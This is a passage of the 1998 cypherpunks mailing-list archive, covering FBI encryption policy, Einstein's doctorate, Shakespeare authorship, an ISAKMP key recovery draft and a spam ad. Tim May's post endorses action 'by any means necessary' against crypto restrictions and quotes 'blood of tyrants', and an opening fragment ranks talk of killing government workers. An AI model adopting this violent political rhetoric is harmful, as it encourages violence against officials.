Thoughtcrime: arrested for possessing or viewing certain images of sex.

1/4 shade of grey: lottery talk to terminate government workers.

1/2 shade of grey: above person also caught hassling government employees.
   (I haven't really followed the Bell case; wasn't he caught stink-bombing
    IRS offices or something?

3/4 shade of grey: a magazine accepting an ad for ~"killer for hire".

black: Vulis sending threats in my name.

---guy, Vulis AntiMatter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 7 Sep 1998 04:15:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: 090498_crypto
Message-ID: <199809062012.QAA00594@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Ying:

   >   From: Jim Choate <ravage@EINSTEIN.ssz.com>
   >
   >      Tauzin: FBI won't get crypto key and more on high-tech and Capitol Hill 
   >      September 3, 1998 5:55 PM PT
   >      Updated at 6:58 PM PT
   >      
   >      SAN FRANCISCO -- An influential Congressman says Congress is close to
   >      resolving the bitter dispute over encryption software, and it looks as
   >      though it will be decided in favor of the high-tech industry.
   >      
   >      U.S. Rep. Bill Tauzin, R-La., said flatly that "we're not going to
   >      give the FBI the keys to the encryption system." The remark came as
   >      part of a wide-ranging interview with ZDNN.

Yang:

Subject: Terrorist FBI, on Terrorism
Date: Fri, 4 Sep 1998 09:58:23 EDT

Statement for the Record
FBI Director Louis J. Freeh before the Senate Judiciary Committee,
September 3, 1998

Good morning Chairman Hatch and members of the judiciary committee. I
am pleased to be with you this morning as you explore the U.S.
Government's response to international terrorism.

[snip]

THE FUTURE

Would like to close by talking briefly about steps we can take to
further strengthen our abilities to prevent and investigate terrorist
activity.

ENCRYPTION

One of the most important of these steps involves the FBI's encryption
initiative. Communication is central to any collaborative effort --
including criminal conspiracies. Like most criminals, terrorists are
naturally reluctant to put the details of their plots down on paper.
Thus, they generally depend on oral or electronic communication to
formulate the details of their terrorist activities.

For this reason, the law enforcement community is very concerned about
the serious threat posed by the proliferation of encryption
technology. Current standards do not allow for law enforcement access
or the timely decryption of critical evidence obtained through lawful
electronic surveillance or search and seizures.

The FBI supports a balanced encryption policy that satisfies fourth
amendment concerns for privacy, the commercial needs of industry for
robust encryption, and the government's public safety and national
security needs.

The encryption capabilities available to criminals and terrorists
today effectively thwart the ability of law enforcement agencies to
implement the court-ordered surveillance techniques that have helped
put some of the nation's most dangerous offenders behind bars. Whether
a state police department is racing the clock to find a kidnapped
child or the FBI is attempting to track and prevent the destructive
ambitions of an international terrorist group, the need for timely
access to legally obtained electronic surveillance cannot be
overstated.

[snip]

EXPANSION OF FBI LEGATS

Likewise, the expansion of the number of FBI LEGATS around the world
has enhanced the ability of the FBI to prevent, respond to, and
investigate terrorist acts committed by international terrorists
against U.S. Interests worldwide. As evidenced by developments in the
embassy bombing cases in East Africa, the ability to bring
investigative resources to bear quickly in the aftermath of a
terrorist act can have significant impact on our ability to identify
those responsible. I encourage Congress to support our efforts to
counter the international terrorist threat by continuing to support
expansion of our LEGAT program.

[snip]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 7 Sep 1998 05:28:50 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Einsteins Doctorate
Message-ID: <199809062144.QAA00440@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://tesuque.cs.sandia.gov/~bbooth/docs/einstein/einachievements.html

> Einstein worked at the patent office in Bern, Germany from 1902 to 1909. While
> he was there, he completed many publications of his theories concerning
> physics. He finished these on his own with no help from any scientific
> literature or colleagues. Eins tein earned a doctorate from the University of
> Zurich in 1905. In 1908, he became a lecturer at the Universtiy of Bern, and in
> the following year became professor of physics at the University of Zurich.

Nothing here or anywhere else I can find about Einstein getting an honorary
anything other than a membership in the New York Plumbers Union after Albert
had made a comment about being a plumber after being asked what he would do
if he didn't do physics.


    ____________________________________________________________________

                         To understand is to invent

                                       Jean Piaget

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 7 Sep 1998 04:57:46 +0800
To: cypherpunks@cyberpass.net
Subject: "Einstein's degree wasn't honorary...."
In-Reply-To: <199809050213.VAA10742@einstein.ssz.com>
Message-ID: <v04011742b218a440643b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



...says Jim Choate from the bowels of my kill file.


I believe I was talking about his doctorate, which, I think you'll see, was
in fact given to him on the strength of his already published work, by a
school in which he wasn't enrolled.

I would call that, no matter the rigor attached to the degree and the
quality of the school handing it out -- both of which were considerable, if
I remember -- an "honorary" doctorate.

As honorary degrees go, the Swiss school which did confer a doctorate upon
Einstein, and upon Diffie as well, I think, was supposed to be about the
best one you can get.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 7 Sep 1998 05:36:35 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Einstein, more specific about degree
Message-ID: <199809062153.QAA00511@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.geocities.com/CapeCanaveral/Lab/3555/einwho2.html

>    Einstein as a patent clerk Albert Einstein returned to the Zurich
>    Polytechnic, after attending secondary school at Arau and graduated
>    there in the spring of 1900 as a secondary school teacher of
>    mathematics and physics. By then he had given up German citizenship in
>    favor of Swiss, to avoid the draft. He worked about two month as a
>    mathematics teacher, before he was employed as examiner at the Swiss
>    patent office in Bern. Having now a certain economic security he
>    married Mileva Maric, his university girlfriend three years later.
>    
>    Einstein became father in 1904 when his wife gave birth to his son
>    Hans Albert.
>    
>    Early in 1905 he published a thesis, "A New Determination of Molecular
>    Dimensions" in the prestigious physics monthly "Analen der Physik"
>    which won him a Ph.D. from the University and was the begin of the end
>    for the old view of the universe. Previous 


    ____________________________________________________________________

                         To understand is to invent

                                       Jean Piaget

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 7 Sep 1998 11:06:10 +0800
To: cypherpunks@cyberpass.net
Subject: What we are Fighting
In-Reply-To: <199809062012.QAA00594@panix7.panix.com>
Message-ID: <v03130307b218f992deb9@[209.66.100.36]>
MIME-Version: 1.0
Content-Type: text/plain




>> Subject: Terrorist FBI, on Terrorism
>> Date: Fri, 4 Sep 1998 09:58:23 EDT
>>
>> Statement for the Record
>> FBI Director Louis J. Freeh before the Senate Judiciary Committee,
>> September 3, 1998

>> The FBI supports a balanced encryption policy that satisfies fourth
>> amendment concerns for privacy, the commercial needs of industry for
>> robust encryption, and the government's public safety and national
>> security needs.

For the Nth time, let me restate the obvious: all current crypto
restrictions being discussed involve _exports_. There are no domestic
restrctictions whatsoever on domestic use of crypto. Any of us, even
resident aliens, tourists, terrorists, etc. are perfectly free to use PGP,
one time pads, stego, and even Meganet Snake Oil Unbreakable Crypto.

There are, officially, no proposals on the table to limit speech within the
U.S. by limiting the types and forms of language may use. There is the SAFE
bill, which stands zero chance of passing, but this involves relaxing
export requirements (though I expect compromises added, such as the
felonization of crypto use in a crime, are an unwelcome step toward
domestic restrictions).

But it bears constant repeating, especially to the skeptical, that there
are NO DOMESTIC CRYPTO LAWS. Unlike some other countries, the fascists have
not yet managed to get a foothold in the attempt to limit use of crypto by
the citizen-units.

We all know this, but Freeh and Company continue to mumble about "meeting
the legitmate needs of law enforcement." What can they be speaking of?

And since the Fourth Amendment is an internal U.S. thing (not counting
limited applicability to some foreigners, and of course to U.S. citizens
abroad who encounter U.S. offices, etc.), what can Louis possibly be
referring to when he speaks of the Fourth Amendment? Surely he is not
referring to satisfying the Fourth Amendment concerns for privacy amongst
the Russians, Afghans, and so forth?

Obviously his side is contemplating domestic crypto restrictions.

We all know this, but it sometimes bears repeating what the Constitution
says, what the status quo is, and what they are proposing.

They are planning domestic crypto restrictions, GAK, and all the rest of
what we have long expected.

When that comes, anyone will be full jusfified in taking action by any
means necessary to halt the onset of the total state.

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 7 Sep 1998 09:32:07 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Last Einstein & his degree...
Message-ID: <199809070147.UAA00864@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.humboldt1.com/~gralsto/einstein/early.html

>    After two years he obtained a post at the Swiss patent office in Bern.
>    The patent-office work required Einstein's careful attention, but
>    while employed (1902-09) there, he completed an astonishing range of
>    publications in theoretical physics. For the most part these texts
>    were written in his spare time and without the benefit of close
>    contact with either the scientific literature or theoretician
>    colleagues. Einstein submitted one of his scientific papers to the
>    University of Zurich to obtain a Ph.D. degree in 1905. In 1908 he sent
>    a second paper to the University of Bern and became a lecturer there.
>    The next year Einstein received a regular appointment as associate
>    professor of physics at the University of Zurich.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@pathfinder.com>
Date: Mon, 7 Sep 1998 10:15:27 +0800
To: Information Security <guy@panix.com>
Subject: Re: 090498_crypto
In-Reply-To: <199809062012.QAA00594@panix7.panix.com>
Message-ID: <Pine.GSO.3.95.980906221144.24713B-100000@cp.pathfinder.com>
MIME-Version: 1.0
Content-Type: text/plain



Crypto came up a couple times during Q&A as well. 

-Declan


On Sun, 6 Sep 1998, Information Security wrote:

> Ying:
> 
>    >   From: Jim Choate <ravage@EINSTEIN.ssz.com>
>    >
>    >      Tauzin: FBI won't get crypto key and more on high-tech and Capitol Hill 
>    >      September 3, 1998 5:55 PM PT
>    >      Updated at 6:58 PM PT
>    >      
>    >      SAN FRANCISCO -- An influential Congressman says Congress is close to
>    >      resolving the bitter dispute over encryption software, and it looks as
>    >      though it will be decided in favor of the high-tech industry.
>    >      
>    >      U.S. Rep. Bill Tauzin, R-La., said flatly that "we're not going to
>    >      give the FBI the keys to the encryption system." The remark came as
>    >      part of a wide-ranging interview with ZDNN.
> 
> Yang:
> 
> Subject: Terrorist FBI, on Terrorism
> Date: Fri, 4 Sep 1998 09:58:23 EDT
> 
> Statement for the Record
> FBI Director Louis J. Freeh before the Senate Judiciary Committee,
> September 3, 1998
> 
> Good morning Chairman Hatch and members of the judiciary committee. I
> am pleased to be with you this morning as you explore the U.S.
> Government's response to international terrorism.
> 
> [snip]
> 
> THE FUTURE
> 
> Would like to close by talking briefly about steps we can take to
> further strengthen our abilities to prevent and investigate terrorist
> activity.
> 
> ENCRYPTION
> 
> One of the most important of these steps involves the FBI's encryption
> initiative. Communication is central to any collaborative effort --
> including criminal conspiracies. Like most criminals, terrorists are
> naturally reluctant to put the details of their plots down on paper.
> Thus, they generally depend on oral or electronic communication to
> formulate the details of their terrorist activities.
> 
> For this reason, the law enforcement community is very concerned about
> the serious threat posed by the proliferation of encryption
> technology. Current standards do not allow for law enforcement access
> or the timely decryption of critical evidence obtained through lawful
> electronic surveillance or search and seizures.
> 
> The FBI supports a balanced encryption policy that satisfies fourth
> amendment concerns for privacy, the commercial needs of industry for
> robust encryption, and the government's public safety and national
> security needs.
> 
> The encryption capabilities available to criminals and terrorists
> today effectively thwart the ability of law enforcement agencies to
> implement the court-ordered surveillance techniques that have helped
> put some of the nation's most dangerous offenders behind bars. Whether
> a state police department is racing the clock to find a kidnapped
> child or the FBI is attempting to track and prevent the destructive
> ambitions of an international terrorist group, the need for timely
> access to legally obtained electronic surveillance cannot be
> overstated.
> 
> [snip]
> 
> EXPANSION OF FBI LEGATS
> 
> Likewise, the expansion of the number of FBI LEGATS around the world
> has enhanced the ability of the FBI to prevent, respond to, and
> investigate terrorist acts committed by international terrorists
> against U.S. Interests worldwide. As evidenced by developments in the
> embassy bombing cases in East Africa, the ability to bring
> investigative resources to bear quickly in the aftermath of a
> terrorist act can have significant impact on our ability to identify
> those responsible. I encourage Congress to support our efforts to
> counter the international terrorist threat by continuing to support
> expansion of our LEGAT program.
> 
> [snip]
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: announce@inbox.nytimes.com (New York Times subscription robot)
Date: Mon, 7 Sep 1998 12:20:16 +0800
To: cypherpunks@cyberpass.net
Subject: Welcome to The New York Times on the Web
Message-ID: <199809070504.AAA45356@inbox.nytimes.com>
MIME-Version: 1.0
Content-Type: text/plain



Welcome bogus47,

Thank you for registering for The New York Times on the Web!

Your ID is bogus47
You selected your password at registration.
Your e-mail address is cypherpunks@cyberpass.net

The Times on the Web brings you the authority and integrity of The
New York Times, with the immediacy, utility and depth of the Internet.
You'll find the daily contents of The Times, along with news updates every
10 minutes from the Associated Press and throughout the day from 
New York Times editors.

You'll also find reports and features exclusive to the Web in our
Technology and Books areas. You can explore a 365-day archive 
of The New York Times for free, and download articles at a small charge.

The site also features:

== Up-to-the-minute sports scores and statistics
== Breaking market news and custom stock portfolios
== Current weather conditions and five-day forecasts 
for more than 1,500 cities worldwide
== A free, searchable library of more than 50,000 New York Times 
book reviews
== A searchable database of help wanted listings
== The crossword puzzle, bridge and chess columns, available 
by subscription

Thanks again for registering. Please visit us again soon at
http://www.nytimes.com

Sincerely,
Rich Meislin
Editor in Chief
The New York Times Electronic Media company

*****************************************

Please do not reply to this message.  If you did not authorize 
this registration, someone has mistakenly registered using your 
e-mail address.  We regret the inconvenience; please see
http://www.nytimes.com/subscribe/help/cancel.html for instructions.

For more information about The New York Times on the Web
and your registration, please visit the Help Center at:
http://www.nytimes.com/subscribe/help/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roger@opusnet.com
Date: Mon, 7 Sep 1998 00:37:30 +0800
To: cypherpunks@toad.com
Subject: Let Us Promote Your Site -bfftoehx
Message-ID: <rqrnptjhmskpmxfb>
MIME-Version: 1.0
Content-Type: text/plain



-------------------------------------------------------------------
cypherpunks  Removal Instructions can be found at the bottom of this page !
-------------------------------------------------------------------


Hello cypherpunks

I found your name on this website if you are not the contact for it please foward this to the proper party.

Your Site Lost in Cyberspace? Let our team of Experts Professionally Submit your Web Page for you to as many as 900 Sites. As low as .02 per search engine submission. 
1: GET MAXIMUM EXPOSURE
2: MAKE MONEY
3: YOUR TIME IS VALUABLE 
4: MISTAKES CAN BE COSTLY 
How quickly can you do it?
We'll start immediately. Submissions are usually completed within 5 working days (Monday to Friday) of receiving your confirmation. 
When will my listings appear?
Some sites post additions immediately, others may take up to several weeks to process submissions. 
How will I know that the submissions were done?
Within days of completion we will provide you with a report detailing exactly where your listing was submitted. If you want to, you can easily go to the sites and check for yourself. Although we can not guarantee that all sites will accept your listing (content may not be appropriate)  Also, we have carefully selected sites that are likely to accept all submissions. 
What's it going to Cost me? 
Submit to 900 sites Only $25.00 One time Special from this e-mail 
if you order in the next 48 hours
8: YES! Submit my Web page for me! 
Don't delay a minute longer! If you are serious about doing business on the Internet, this is the most essential step you need to take after getting your pages on-line. Simply fill out our order form fax it in to us and Start building your traffic today!

-------------------------------CUT HERE-------------------------------------
SECTION 1: Personal Information 

Your Full Name:__________________________
 
Your eMail Address:_________________________
 
Your Phone#:_________________________
 
Your Fax#:___________________________


SECTION 3: Submission Information

Save Time and Delays by following our guidelines closely. If a length limit is exceeded (for example) we will have to ask you to shorten your information - thus delaying the process. Please do not type in ALL CAPS. 
NOTE: Each submission site has different submission forms. We will complete all available fields, however, all of the following information may not be listed at all sites. 
Company or Business name to include in submissions:
___________________________________________

Enter Your Web Page Title:_______________________________
 
NOTES: Your title should be no more than 40 CHARACTERS and include good keywords that describe the content of your Web page. Also, if you want it to appear near the top of alphabetically arranged lists and directories try and have the first letter of the title be an "A", "B", or "C" etc. Whatever you do, it should look like it belongs there or it may get chopped of by a site administrator. It doesn't necessarily have to match your actual Web Page title. In our opinion, it is redundant to include words such as "home page", "corporation" or other redundant words that are unlikely to be searched for, or that that unlikely to entice the viewer to click on YOUR title. You have only a few seconds to get a web surfers attention! 
Enter the URL for your Web Page:___________________________________
 
NOTE: If you wish to have us submit more than one web page please fill out and submit this form for each individual page (simply fill out the form, submit it, make any necessary changes and submit it again). We can submit any page that has a unique URL.

Suggest a possible category to place your listings in:

__________________________________
 

Enter a DESCRIPTION of the nature of your Web page (it MUST be 25 WORDS or less). Use good words in your description so that when a directory is searched your listing will be returned. Make sure you include your most important KEYWORDS as only a few sites have a field that allow us to submit KEYWORDS as a separate item. Don't overlook the obvious (computers, software, travel, book, gifts, etc.)!: 
 


______________________
Enter an alternate Short DESCRIPTION of the nature of your Web page (8 WORDS or less). We will use the long description wherever possible: 

________________________
 

Enter up to 20 single KEYWORDS (separated by spaces) that best describe the content of your Web page: 


__________________
 

Person's name to include in submissions:


__________________________
 
eMail address to include in submissions:


__________________________
 
Phone number with area code to include in submissions:

_____________________
 
Fax number with area code to include in submissions (RECOMMENDED):

________________
 
Toll Free 0800 number to include in submissions (if available):


____________________________
 

Mailing Address to include in submissions: 


_____________________________

SECTION 3: Payment Information
Under no circumstances will any work commence
until a valid form of payment is received!
NOTE:  you can call us in person at our voice or Fax number, OR you may fill out this form, print it out and Fax it to us. 
Lucid Technologies Inc
5646 Wellesly Pk. Dr.
Boca Raton, FL 33433
Our voice number is: 561-347-7304, our Fax number is: 561-347-7304
Also if you would like you site or product promoted by mass email or wish to buy mass e-mail products please call 561-347-7304
Sales Code #DS1021
Method of Payment: We Accept Check by Fax  or Credit cards 

If paying by Credit Card we will need the following information
We accept Visa, Mastercard, Diners Club

Card Holders Name: _______________________________

Mailing Address For Credit Card bill:
Street: _______________________
____________________________
City:_______  State:___________  ZIP:____________
              
To Pay By Check

Please Print Out this Form Take a blank check write void on it  and tape it to this form and fax it back to us and enter your drivers licence number or state id here

___________________________________


Tape Check here

Fax this form to 561-347-7304
------------------------------------------CUT HERE-------------------------------------
The Sender Of this E-mail is a Member of the Internet responsible marketers (I.R.M.A) Association #12995
The Mailing List that you are being mailed from was filtered against
the Global Remove List at: http://remove-list.com
Remove-List is a free public service offering to help the general public
get removed from bulk mailings lists and has not sent this message. If 
you want their help please add your name to their list and we you will 
not receive a bulk email from us or any other ethical bulk emailer.

Also if you wish to have your product or service promoted by Bulk mail please call 561-347-7304






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 7 Sep 1998 16:01:00 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Snakes of Medusa torment Larry Detweiler
In-Reply-To: <v03130306b2166860ec91@[209.133.20.5]>
Message-ID: <199809070757.AAA07875@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



hi timmy. we have reached a breakthrough in your psychotherapy
in which you actually address me directly <g>

you completely gloss over my point about Linux, because
it demonstrates my arguments very well. those who work
on Linux are very similar to cpunks. distributed all
over the world, and they are united by a common desire/vision
and mailing lists.  you have an unexpressed 
hatred of some aspects of
hacking, of course, so you find linux repulsive and
incomprehensible.

this list has always lacked vision, by *anyone*. a group
is united by a vision. if you have no vision, you have
nothing but a bunch of anarchists who cannot accomplish
anything substantial together. want proof? how about the
history of the last few years of mounting irrelevance of
this list?

what you get is miniature
projects that may succeed or fail, and if they succeed,
an implication is carried that they are "cpunk" projects.
there are obviously no cpunk projects. and that's the
weakness of this so-called "group". any time such a project is proposed
by anyone, self-righteous anarchists such as yourself
shoot it down.

ok, mount one of your lame arguments that "this is only
a mailing list. there are no projects". again, precisely.
you want more out of this list, or less? every time I 
tell you how to get more, you say you want less. every
time you complain you get less, I tell you how to get more.

sure, let's have an immature debate society. we've had
that for what, ~6 years or so? the time flies when you're
having fun <g>

aren't you somewhat ashamed that the recent EFF crack
had *nothing* to do with anyone on this list? frankly, I think
it's pretty lame. imagine the way a 
mailing list can help mobilize support and
resources. we've seen glimpes in the past of this.
instead Gilmore did it entirely behind the
scenes, never announcing it to this list, because 
clearly no one here has the maturity to cooperate to complete
a meaningful project. there are only complaints, as lead
by the Lead Sniper. (wow, that's a funny term, with lots
of implications, I think I might start using it more often!!!)
btw, killed any cats lately??

a huge waste of talent, if you ask me, and the main reason
that you have such a high turnover/attrition on this list.
ever asked yourself why there is so much turnover/attrition
here? but we're not going to get very far, with you conveniently
deleting my key points as usual. stick your head in the
digital /dev/null some more. see no VZN, hear no VZN, 
speak no VZN. truly your philosophy...!!!

"eletrocracy"? I have no idea what you're talking about.
whatever it is, it does sound pretty infantile!!!
a useful straw man, I suppose.  maybe if you elaborated it 
might refresh my memory <g>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 7 Sep 1998 16:13:31 +0800
To: cypherpunks@cyberpass.net
Subject: digital sig bill
Message-ID: <199809070809.BAA08498@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

To: believer@telepath.com
From: believer@telepath.com
Subject: IP: About Digital Signature Bill

09/05/98 0752

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/0904-138.txt

Abraham Urges Senate to Pass Digital Signature Bill 
U.S. Newswire
4 Sep 17:30

 Abraham Urges Senate to Pass Digital Signature Bill Next Week
 To: National Desk
 Contact: Joe McMonigle of the Office of U.S. Sen. Spencer Abraham,
          202-224-8833

   WASHINGTON, Sept. 4 /U.S. Newswire/ -- While President Clinton
used a visit in Ireland today to digitally sign an electronic
commerce agreement with Irish Prime Minister Bertie Ahern on a laptop
computer, U.S. Sen. Spencer Abraham (R-Mich.) urged his colleagues in
the Senate to pass his legislation requiring federal agencies to
start allowing the public to do the same.

   S.2107, the Government Paperwork Elimination Act, would require
federal agencies to make versions of their forms available online and
allow people to submit these forms with digital signatures instead of
handwritten ones.  It also sets up a process by which commercially
developed digital signatures can be used in submitting forms to the
government and permits the digital storage of federal documents.

   "If it's okay for President Clinton and Prime Minister Ahern, it
should also be okay for the federal government to recognize the
digital signature of ordinary Americans," Abraham said.  "This
legislation will bring the federal government into the electronic
age, in the process saving American individuals and companies
millions of dollars and hundreds of hours currently wasted on
government paperwork," Abraham said.  "Each and every year, Americans
spend in excess of $600 billion simply filing out, documenting and
handling government paperwork.  This huge loss of time and money
constitutes a significant drain on our economy and we must bring it
under control."

   "By providing individuals and companies with the option of
electronic filing and storage, this bill will reduce the paperwork
burden imposed by government on the American people and the American
economy.  It will allow people to move from printed forms they must
fill out using typewriters or handwriting to digitally-based forms
that can be filled out using a word processor.  This savings in time,
storage and postage will be enormous," said Abraham.

   The Government Paperwork Elimination Act would:

   -- Require the federal government make available its forms online
and allow citizens to sign forms by the use of digital signatures.

   -- Direct the Commerce Department to conduct a study of the impact
of this Act on the use of digital signatures for electronic commerce
and on individual privacy.

   -- Allow Executive Agencies 18 months to establish a method for
agencies to put forms online.  The forms must be able to be filled
out, signed and filed with the agency electronically.

   -- Work to develop a system whereby fees and payments associated
with the forms can also be submitted at the same time.  For example,
a citizen could use their tax software to create all the information
necessary for filling out their tax forms, fill in the IRS online
form, submit it and any indicated payments, and immediately receive a
tax receipt.

   -- Enable the federal government to allow its employees to have
digital signatures for use with citizens and allow agencies to use
electronic notice where written notice had been required, if the
citizen prefers electronic notice.

   -- Establish that a digital signature will have legal standing.

   -- Provide that Administration guidelines and procedures for
electronic signatures that are used for the government forms that are
compatible with those the private sector will be using for commerce,
and specifies that any system used by the government must be industry
and technology neutral.

   -- State that if an employer is required to collect, file and
store paper forms that are completed by employees, that electronic
storage will likely be accepted.

   -- Allow the government five years to implement these provisions.

   "The information age is no longer new.  We are in the midst of a
revolution in the way people do business and maintain records.  The
Government Paperwork Elimination Act will force Washington to catch
up with these developments, and release our businesses from the drag
of an obsolete bureaucracy as they pursue further innovations," said
Abraham.

   Co-sponsors of the Paperwork Elimination Act include Sens. Ron
Wyden (D-Ore.), Jack Reed (D-R.I.), John McCain (R-Ariz.), Trent Lott
(R-Miss.), Thad Cochran (R-Miss.), and Conrad Burns (R-Mont.)

 -0-
 /U.S. Newswire  202-347-2770/
 09/04 17:30

Copyright 1998, U.S. Newswire
- -----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
- -----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Mon, 7 Sep 1998 07:54:14 +0800
To: cypherpunks@Algebra.COM
Subject: Re: ISAKMP Key Recovery Extensions
In-Reply-To: <199809011443.KAA23307@ietf.org>
Message-ID: <m0zFoWr-0003bcC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



>From the IETF's IPSEC Working Group:

	Title		: ISAKMP Key Recovery Extensions
	Author(s)	: T. Markham
	Filename	: draft-rfced-exp-markham-00.txt
	Pages		: 13
	Date		: 31-Aug-98
	
    This document describes the proposed approach for negotiating and
    exchanging key recovery information within the Internet Security
    Association Key Management Protocol (ISAKMP).

ftp://ftp.ietf.org/internet-drafts/draft-rfced-exp-markham-00.txt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Clark" <jonkc@worldnet.att.net>
Date: Mon, 7 Sep 1998 14:05:10 +0800
To: <cypherpunks@cyberpass.net>
Subject: Shakespeare
Message-ID: <000201bdda24$dd4c87e0$0d924d0c@flrjs>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Tim May tcmay@got.net Wrote:

>I read part of a book about some pretty convincing evidence that the
>works of "Shakespeare" were probably written by a member of Queen
>Elizabeth's royal court.

I think that's unlikely, the myth probably started because some people can't
imagine a person without royal blood being a genius.

>This guy had the time, had the education, knew the workings of
>royalty, and was an accomplished writer...all things the nearly-illiterate
>(evidence shows) Wm. Shakespeare, a merchant, did not have.

There is little evidence that Shakespeare was  a merchant, although his
father was, he was a glover and a very successful one, at least until
Shakespeare was a teenager when his Father lost most of his money.
Although he doesn't seem to have gone to collage, as the son of
a rich man he did go to the equivalent of very good grade and high schools
where he certainly learned Latin and Greek and History.  In addition there
Is a 10 year gap between the time he finished "high school" and he when
he wrote his first play. Some think he traveled, some think he was in the
military, whatever he did he must have learned about the world. Also, I
don't see how an actor could be illiterate, true he did spell his name
differently on occasion but that wasn't unusual at a time before spelling
was standardized.

There was certainly an actor named William Shakespeare who got rich off the
royalties from plays he claimed to have written over a period of 20 years,
he made enough money to buy the second largest house in his hometown. If
Shakespeare didn't write them it's hard to understand why the real author
never objected but instead kept writing new plays to make another man even
more money.

>one of the biggest problems with applying computerized analysis
>to these works is the paucity of material known to be written by the
>"real" Wm. Shakespeare, the historical person.

If you look at all the words in Shakespeare's plays and poems you will find
that about 30% of the words he uses one time and never again in anything he
wrote. This percentage is vastly greater than any other writer of his day
or our own. I think this statistic is amazing and probably important, but I
confess I'm not quite sure what to make of it. Does it prove it was written
by a committee or by a genius who could always find exactly the right word?
I lean toward the genius theory.


PS; Tim this is the first time I've had the pleasure of responding to one of
your posts since you were on the Extropian List, I'm still on that list
because it has a much higher signal to noise ratio than most, feel free to
drop by for a visit, you would be welcome.

  John K Clark    jonkc@att.net


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQA/AwUBNfN1JN+WG5eri0QzEQIVTACfbLmnspemT7gid05/JlPBDtuMUfUAoP+E
S8k9L8yiMJmJzN+chRDY7tjV
=vAg0
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 7 Sep 1998 15:38:02 +0800
To: "Frank O'Dwyer" <fod@brd.ie>
Subject: Re: [Fwd: ISAKMP Key Recovery Extensions]
In-Reply-To: <35F37E90.76109489@brd.ie>
Message-ID: <199809070734.DAA21427@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



